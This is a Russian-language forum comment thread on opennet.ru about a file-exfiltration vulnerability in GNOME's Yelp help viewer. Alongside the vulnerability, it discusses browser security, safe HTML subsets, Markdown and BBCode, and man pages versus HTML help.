  • +/
    Поскольку оно требует понимания, что есть иньекция, а что инфекция Ясно, пример... текст свёрнут, показать
     
  • 2.18, Жироватт (ok), 11:52, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Ну, манов и размеченных groff'ом файлов справки вам мало - вам, Простым(тм) Пользователям(с) нужен полностью интерактивный документ с раздвигающимися списочками, красиво масштабирующимися картинками и прочим веб2.0 (как ещё к справке не прикрутили "поделиться в твиттере/фейсбуке" - ума не приложу).

    Вот вам готовый аштэмээль, со всеми его плюсами и минусами. Что-то не так?

     
     
  • 3.30, Аноним (30), 12:41, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Дядь, документация к Гному и Гимпу точно не того масштаба чтобы запихать ее в ман, дабы он сплошной серой простыней вываливался в черную консоль.
     
     
  • 4.54, Аноним (55), 14:17, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Документация и справка — это вообще разные вещи.
     
     
  • 5.57, Аноним (8), 14:25, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Документация и справка

    Пассатижи и плоскогубцы это разные вещщи.

     
  • 5.106, Аноним (8), 17:43, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Документация и справка — это вообще разные вещи.

    Это все общие понятия.

    А вода это не вода а Монооксид дигидрогена.

     
     
  • 6.168, Аноним (168), 16:37, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Лобзик и бензопила — тоже общие понятия.
     
  • 3.112, Аноним (110), 18:32, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Текстовый ман к _графическому_ редактору — это очень по-линуксовому. Примеры, надо полагать, в ASCII рисовать придётся. Чего только на опеннете не прочитаешь!
     
     
  • 4.140, Аноним (8), 01:47, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Текстовый ман к _графическому_ редактору — это очень по-линуксовому. Примеры, надо полагать, в ASCII рисовать придётся.

    Ну может там документация чтобы запустить этот самый Gnome, Gimp, например с параметрами, чтобы посмотреть документацию с примерами которые не ASCII, нарисованы.

     

     ....большая нить свёрнута, показать (119)

  • 1.2, Аноним (-), 10:35, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > Выполнение подобных скриптов даёт возможность отправить файлы пользователя на сервер атакующего.

    Повторили вулн файрфокса позволявший у пользователей тырить ключи ssh и проч...

     
  • 1.6, Аноним (6), 11:05, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +4 +/
    Возможность исполнять JavaScript-код в хелп файле ЗАЧЕМ!?
     
     
  • 2.9, 1 (??), 11:08, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Красиво же ! Опять же help - это html. А движок показа html выполняет и JS.
     
     
  • 3.46, Соль земли (?), 13:43, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Необязательно. За JS отвечает отдельный движок.
     
     
  • 4.178, anonymous (??), 10:26, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Необязательно. За JS отвечает отдельный движок.

    Это раньше было. Сейчас они идут неразрывной связкой.

     
  • 2.51, Аноним (27), 13:57, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ну виртуалку в PDF же запускают.
     
     
  • 3.77, Аноним (6), 15:32, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    В PDF часто формы бланков для запонения делают. Хоть какое-то обоснование JS.
     

  • 1.14, Жироватт (ok), 11:48, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >  Для атаки злоумышленнику необходимо добиться загрузки своего файла index.page на систему пользователя а потом из браузера нужно получить каталог загрузки и только потом инициировать переход со своей страницы на URL ghelp://" с путём к каталогу, в который загружен файл

    1) Почему это уязвимость подсистемы справки гнома, а не браузера, который отдаёт стороннему скрипту инфо о каталоге загрузки файла, достаточную, чтобы сформировать запрос на локальный путь?
    2) Почему вообще браузер сообщает что-то пользовательскому скрипту, кроме сингалов "файл загружен успешно"/"загрузка прервана, повтори"?

    Новость ради новости, уязвимость уровня "дайте какеру доступ до вашего ПК - он скачает ваши фоточки"

     
     
  • 2.19, Аноним (16), 11:52, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Новость ради новости, уязвимость уровня "дайте какеру доступ

    и пароль рута.

     

  • 1.17, anonymous (??), 11:51, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Мне кажется, давно уже назрела необходимость создания безопасного подмножества html, ТОЛЬКО для разметки текста. Без скриптов, без абсолютного позиционирования и фреймов. Чтобы можно было вставить как есть в любой пост на том же opennet к примеру, и чтобы у читателей такого html-like комментария ни в каком случае не утекли данные или не порвалась разметка всей страницы.

    Подобное html-подмножество много где интересно применить будет. В том Jupyter к примеру.

     
     
  • 2.21, Жироватт (ok), 11:54, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +5 +/
    gopher + gemini, все давно уже придумано до вас.
     
  • 2.41, Аноним (40), 13:13, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +3 +/
    > Мне кажется, давно уже назрела необходимость создания безопасного подмножества html, ТОЛЬКО
    > для разметки текста. Без скриптов,

    Ну так рендери только HTML - и отключи JS. Правда, половина сайтов сломается нахрен. Но опеннет работать - будет.

     
     
  • 3.56, Аноним (8), 14:24, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Ну так рендери только HTML - и отключи JS. Правда, половина сайтов сломается нахрен. Но опеннет работать - будет.

    Это потому что 99% сайтов делают по шаблону.
    Которые называют себя кодерами.
    Есть готовые шаблоны.

    Так значит это шаблон разрастился.

     
  • 3.96, Аноним (-), 16:46, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Но опеннет работать - будет.

    Я где-то полгода назад проверял - не будет

     
     
  • 4.175, Аноним (-), 18:20, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    >> Но опеннет работать - будет.
    > Я где-то полгода назад проверял - не будет

    Хреново проверял - работает, здесь и сейчас.

     
  • 3.113, anonymous (??), 18:33, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну так рендери только HTML - и отключи JS. Правда, половина сайтов сломается нахрен. Но опеннет работать - будет.

    Если дать пользователям возможность вставлять в комментарии произвольный html код, то они и при выключенном яваскрипте смогут загадить страничку для всех читателей.

    Смысл затеи в том, чтобы сделать некоторый безопасный стандарт-подмножество html, которые можно разрешить вставлять в страничку даже анонимусу без угрозы поломать сайт.

     
     
  • 4.135, Аноним (55), 00:56, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Про BBCode, поди, никто и не помнит уже.
     
     
  • 5.142, Аноним (142), 02:25, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Особенно на этом-то

    сайте

    .
     
     
  • 6.167, Аноним (168), 16:35, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    А кроме этого, он тут ничего и не умеет (даже [s]зачёркнутый[/s] текст).
     
  • 5.152, anonymous (??), 10:37, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    BBCode слишком убог. От того и не прижился, тот же markdown его вытеснил
     
     
  • 6.166, Аноним (168), 16:33, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну как ты в Mardown раскрасишь букаффки, вставишь фрейм и "поиграешься шрифтами" ?
     
  • 6.177, Аноним (142), 04:21, 10/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    BBCode везде на phpBB-форумах. Они вышли из моды, BBCode вместе с ним.

    В BBCode акцент на то, чтобы дать всё необходимое форматирование и запретить остальное

    В Markdown вставка HTML не считается чем-то плохим (поэтому чистый маркдаун обычно беднее BBCode), его не для форумов разрабатывали.

     
  • 2.42, Аноним (3), 13:20, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Простите, но есть Markdown.
     
     
  • 3.66, 12yoexpert (ok), 14:50, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    зачем этот костыль, когда есть LaTeX?
     
  • 3.86, 1 (??), 15:55, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ну как ты в Mardown раскрасишь букаффки, вставишь фрейм и "поиграешься шрифтами" ?
     
     
  • 4.137, Аноним (142), 01:39, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Через вставку кусков HTML. Это часть идеи Markdown.

    In my opinion, HTML tags are already easy to insert.
    For any markup that is not covered by Markdown’s syntax, you simply use HTML itself.
    https://daringfireball.net/projects/markdown/syntax

     
  • 3.111, anonymous (??), 18:29, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Простите, но есть Markdown.

    Тогда уж asciidoc. А то маркдаун как-то слишком убог.

    Но суть в том, что и markdown и asciidoc - это фронтенды. Что-то вроде языка программирования. А html (упрощенное и безопасное подмножество) - это уже бекенд, что-то вроде байткода. Ты берёшь удобные для писателя представления вроде markdown или asciidoc, и перегоняешь их уже в html - для удобства отображения у читателя.

    В принципе asciidoc работает похожим образом, генерируя docbook. Но docbook недостаточно распространён чтобы стать таким универсальным бекендом. К тому же помимо текстовой генерации есть и табличная генерация, например pandas в Jupyter. Было бы удобно подсадить их всех на общий бекенд.

     
     
  • 4.141, Аноним (141), 01:57, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Каким это богом он убог? Маркдаун так то позволяет размечать текст так же как базовый хтмл, заголовки, параграфы, таблицы, картинки есть. И имхо, удобнее чем писать теги, банально изза того, что в мд - простые стмволы, а в хтмл - надо писать целые слова, так еще и помнить что половину тегов надо закрывать, не забыть каким слешем еще.

    Я наоборот жду, когда браузеры научатся рендерить мд сами, из коробки.

    Но круче всего было бы, если бы придумали что-то на основе мд, такое же простое и элегантное, но для верстки страниц. Верстать в гига_мд, а текст форматировать обычным мд.

     
     
  • 5.153, anonymous (??), 10:40, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Это вы о каком маркдауне? На каждом сайте своё собственное расширение, потому что стандарта нет. Сравните лучше с аскидоком.

    Для верстки страниц можете попробовать bootstrap - там как раз собрали наиболее типовые решения в верстке, которыми вы можете легко оформить приблизительный вид сайта, при необходимости дописав отдельные стили.

     
  • 2.95, Аноним (-), 16:45, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > без абсолютного позиционирования

    А чем вам абсолютное позиционирование (CSS2) помешало то?

     
  • 2.115, Аноним (110), 18:36, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    > подмножества html, ТОЛЬКО для разметки текста

    Уже. Называется HTML. Пушка вообще! Для многих это будет откровением, но HTML позволяет размечать текст без использования скриптов (и даже без CSS, но это пока что секретные технологии, поэтому никому не говори!). А современные рендеры HTML позволяют и вовсе игнорировать некоторые теги, например <script>.

     
     
  • 3.151, anonymous (??), 10:36, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Причём тут CSS? Свойства стилей можно не в таблице стилей указывать, а прям в самом html элементе. В том числе абсолютное позиционирование, которое отрисует квадратики поверх меню или отрицательный маржин, из-зачего пост пользователя будет закрывать соседние.

    Когда-то html был скромен и удобен. Сейчас html - это инструмент для создания веб приложений, а не веб контента.

     

  • 1.23, Аноним (23), 12:01, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Не совсем понял. По итогу что в справке, что в браузере можно выполнить опасный скрипт. Но почему скрипт из вебкита справки может отправить файл с ключами, а браузер не может? Кажется в этом проблема, а не в парсинге XML.
     
     
  • 2.65, Ананоним (?), 14:41, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Современный браузер это огромная дырища в безопасности. Никакие файрвол и NAT не помогут. Скрипты страницы могут и гарят по портам локалхоста легко. И в наглую.
     
     
  • 3.72, Аноним (72), 15:13, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Ну открываемые тобой сайты сканируют, что и зачем у тебя запущено. Интересно же.
     
     
  • 4.120, Аноним (8), 19:17, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Ну открываемые тобой сайты сканируют, что и зачем у тебя запущено. Интересно же.

    Ну да всякая таргетинговая реклама.

     
  • 3.116, Аноним (110), 18:40, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > Скрипты страницы могут и гарят по портам локалхоста легко.

    Давно нет. Уже второй стандарт пишут, чтобы шарили только те, которым можно. Первый не очень хорошим оказался, у людей кейсы с интранетами и локальными ресурсами ломались. Но ты не переставай бояться, бабаек под кроватью запасено на всю твою жизнь вперёд.

     
  • 2.71, Аноним (72), 15:10, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Вебкит не изолирован никак. Там достаточно khtml, но нет, они будут пихать blink.
     
     
  • 3.138, мяв (?), 01:42, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    да ну ?
    если в системе есть bwrap - он себя в нем пускает
     

  • 1.53, myster (ok), 14:07, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ага случайная уязвимость по недосмотру, верим.

    Хорошо, что это Open Source, кто-то находит и всю малину им портит. А в Closed Source даже маскировать так бекдоры не надо.

     
  • 1.92, Нуину (?), 16:11, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    Зачем нужен свой просмоторщик для документации в html? Не проще ли в современное время просто поставлять документацию в том же html если хочется, но положить в /usr/share/doc и открывать обычным браузером локально?
     
     
  • 2.98, Аноним (-), 16:57, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    > Не проще ли в современное время просто поставлять документацию в том же html если
    > хочется, но положить в /usr/share/doc и открывать обычным браузером локально?

    Пользователь совсем случайно снес браузер со своего компа.
    И теперь не может погуглить как это исправить. А документация в html.

    Помнишь шутку про заархивированный архиватор? Вот тут то же самое.

     
     
  • 3.130, Нуину (?), 22:07, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    >> Не проще ли в современное время просто поставлять документацию в том же html если
    >> хочется, но положить в /usr/share/doc и открывать обычным браузером локально?
    > Пользователь совсем случайно снес браузер со своего компа.
    > И теперь не может погуглить как это исправить.

    Что ему мешает случайно снести yelp?

    > А документация в html.

    О да, это бинарный формат, открыть любым редактором нельзя и использовать кучу утилит типа grep нельзя же. Вот зачем выдумываете глупости?

     
     
  • 4.131, Нуину (?), 22:08, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +2 +/
    >>> Не проще ли в современное время просто поставлять документацию в том же html если
    >>> хочется, но положить в /usr/share/doc и открывать обычным браузером локально?
    >> Пользователь совсем случайно снес браузер со своего компа.
    >> И теперь не может погуглить как это исправить.

    1. Современный пользователь не читает локальную документацию. Откроет телефон и там узнает.
    2. Документация по установке программ обычно находится в man руководствах.

     
  • 4.134, Аноним (-), 23:19, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Как-то так: https://man.freebsd.org/cgi/man.cgi
    Да, а если не в курсе, то man документацию можно и с командной строки читать оффлайн, если установите конечно
     
     
  • 5.139, Аноним (8), 01:42, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    > man документацию можно и с командной строки читать оффлайн, если установите конечно.

    Разве то что запускается через --help, не создано чтобы заменить многостраничные man?

     
     
  • 6.176, Аноним (176), 18:24, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Что такое "многостраничные"?
     
     
  • 7.202, Аноним (202), 10:40, 12/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    Это на хипстерском. Все, что длиннее поста в твиттере.
     
  • 3.133, Аноним (-), 23:16, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Пользователь совсем случайно снес браузер со своего компа.

    Интернет ещё не отменили, что мешает посмотреть документацию в интернете? На сайте то можно же её разместить? Вы знаете man документация вроде бы как для той же FreeBSD размещена и это удобно.

     
  • 3.136, Аноним (55), 01:02, 09/04/2025 [^] [^^] [^^^] [ответить]  
  • +/
    В линуксе — «центр приложений», далее тривиально.
    В венде снести браузер даже преднамеренно не так просто.
     
  • 2.102, Аноним (8), 17:38, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • –1 +/
    > Зачем нужен свой просмоторщик для документации в html

    Зачем в Xubuntu, minimal нет Mousepad.
    Но есть Nano.

    Вот мне например документацию посмотреть, конфиги, в Nano.
    Прежде чем ставить.

     

  • 1.107, крабб (?), 17:51, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ух ты!
    У меня Федора-MATE а пакет yelp зачем-то установлен в систему. Гнома ни разу не было
    Нафиг он?
     
     
  • 2.119, Аноним (8), 19:15, 08/04/2025 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Gnomo зависимости.
    Meta - пакеты.
    Gtk зависимости.
    Наработки Gnome, перекочевавшие в Mate.
     

  • 1.114, Герострат (?), 18:34, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Зачем страницам справки тюринг-полный язык лол
     
  • 1.129, Вы забыли заполнить поле Name. (?), 21:27, 08/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    а закрыть Yelp-у сеть?
     
  • 1.173, Аноним (173), 17:38, 09/04/2025 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ща им на Пиыоне 2.0 все поправят.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру